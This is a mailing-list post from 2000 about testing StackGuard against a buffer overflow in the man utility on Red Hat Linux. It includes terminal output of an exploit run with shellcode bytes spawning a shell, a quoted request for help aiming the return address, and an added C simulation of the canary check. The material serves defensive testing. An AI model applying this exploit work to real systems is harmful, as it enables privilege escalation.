"Granquist, Lamont" wrote:

> Okay, so I'm setting off to exploit the /usr/bin/man MANPATH exploit on
> RH6.1 (actually my system is RH6.2 i686 with man-1.5g-6 installed on it).
> And I'm looking for a little help here. What I've been playing with so
> far is things like the following trying to sort out the parameters of the
> buffer overflow.
> ...
> So, anyone got any tips for where to point the RA and what the stack
> should look like?

At WireX we've been doing some fresh vulnerability testing. In the attached e-mail, M.C.Mar <[EMAIL PROTECTED]> describes his work for us demonstrating an exploit against the man vulnerability, and then demonstrating that the StackGuarded version of man is not vulnerable.

We are intent on undertaking a continuous evaluation process of testing every working stack smashing exploit we can find for StackGuard compatible platforms (x86/Linux, esp. Red Hat). We would appreciate any help we can get in getting live exploits to actually work. We succeeded with man, but failed with ircii.

Crispin
-----
Crispin Cowan, CTO, WireX Communications, Inc. http://wirex.com
Free Hardened Linux Distribution: http://immunix.org
JOBS! http://immunix.org/jobs.html
Date: Tue, 4 Apr 2000 20:23:07 +0200 (MET DST)
From: "M.C.Mar" <[EMAIL PROTECTED]>
To: Crispin Cowan <[EMAIL PROTECTED]>
Subject: Re: First Penetration Test

OK. I have only two hours today so I started with man. I compiled vulnerable man sources (man-1.5g-6.src.rpm) with regular egcs-1.1.2-12.i386 I have installed on my RH 6.0. I tuned the exploit to produce shell on my system:

[emsi@pipek ~]$ ./a.out
RET: 0xbffff470  len: 4073

sh:F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh ?ó
bash$ id
uid=1000(emsi) gid=1000(emsi) egid=15(man) groups=1000(emsi)
bash$

I attached the exploit.

Then I recompiled the vulnerable code with gcc-2.7.2.3-14_SGc2_SG121.i386.rpm and tested StackGuarded code with my exploit:

[emsi@pipek ~]$ ./a.out
RET: 0xbffff470  len: 4073

sh:F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F V ° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh ?ó
man[6129]: Immunix type 2 Canary[7] = 850e2904 died with cadaver ae4bfc74 in procedure display_cat_file.

As I mentioned at the beginning I have only two hours so I didn't examine the vulnerable code whether it is possible to exploit the vulnerability bypassing StackGuard protection.

--
Mariusz Wołoszyn
Internet Security Specialist, IT -- Internet Partners
E-mail: [EMAIL PROTECTED], [EMAIL PROTECTED]

[Attachment: 4man.c]
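The log line in the forwarded mail shows StackGuard aborting man because the canary word it places between the locals and the saved return address of display_cat_file no longer matched. As an added illustration, not code from this thread or from the 4man.c attachment, the C below simulates that epilogue check on a byte-array frame; the frame layout, the placeholder return address, the 'A'-filled input and the use of the page's canary value as a fixed constant are all assumptions made for the example.

```c
#include <stdint.h>
#include <string.h>
/* Simulated frame (assumption: 32-bit x86/Linux): locals, then the canary
 * StackGuard inserts, then the saved return address. */
#define BUF_LEN    64
#define CANARY_OFF BUF_LEN
#define RET_OFF    (BUF_LEN + 4)
#define FRAME_LEN  (RET_OFF + 4)
/* Constructed canary, value copied from the page's log line; a real
 * StackGuard build picks a random word at process start. */
static const uint32_t CANARY = 0x850e2904u;
enum verdict { RETURN_CLEAN = 0, DIED_WITH_CADAVER = 1 };

/* Unchecked copy of 'len' bytes into the frame's buffer (the defect class in
 * display_cat_file), then the epilogue check StackGuard inserts. Writes are
 * clipped to the simulated frame so the simulator itself stays in bounds;
 * *cadaver receives the canary word actually found afterwards. */
int simulate_return(const unsigned char *input, size_t len, uint32_t *cadaver)
{
    unsigned char frame[FRAME_LEN];
    uint32_t saved_ret = 0x0804abcdu;       /* constructed placeholder */
    uint32_t found;
    memset(frame, 0, sizeof frame);
    memcpy(frame + CANARY_OFF, &CANARY, sizeof CANARY);
    memcpy(frame + RET_OFF, &saved_ret, sizeof saved_ret);
    if (len > FRAME_LEN) len = FRAME_LEN;
    memcpy(frame, input, len);              /* the vulnerable copy */
    memcpy(&found, frame + CANARY_OFF, sizeof found);
    if (cadaver) *cadaver = found;
    return found == CANARY ? RETURN_CLEAN : DIED_WITH_CADAVER;
}

/* A run of n bytes of 'A', standing in for an oversized MANPAGER value. */
int fill_and_return(size_t n, uint32_t *cadaver)
{
    unsigned char input[FRAME_LEN];
    memset(input, 'A', sizeof input);
    return simulate_return(input, n > sizeof input ? sizeof input : n, cadaver);
}

/* Same overflow, but with the canary word written back intact: the check
 * passes, which is why the canary must be unguessable by the caller. */
int overflow_preserving_canary(void)
{
    unsigned char input[FRAME_LEN];
    memset(input, 'A', sizeof input);
    memcpy(input + CANARY_OFF, &CANARY, sizeof CANARY);
    return simulate_return(input, sizeof input, NULL);
}
```

A write that stops inside the buffer, or one that overruns it by even a single byte, is told apart purely by the canary comparison; nothing else in the frame is inspected.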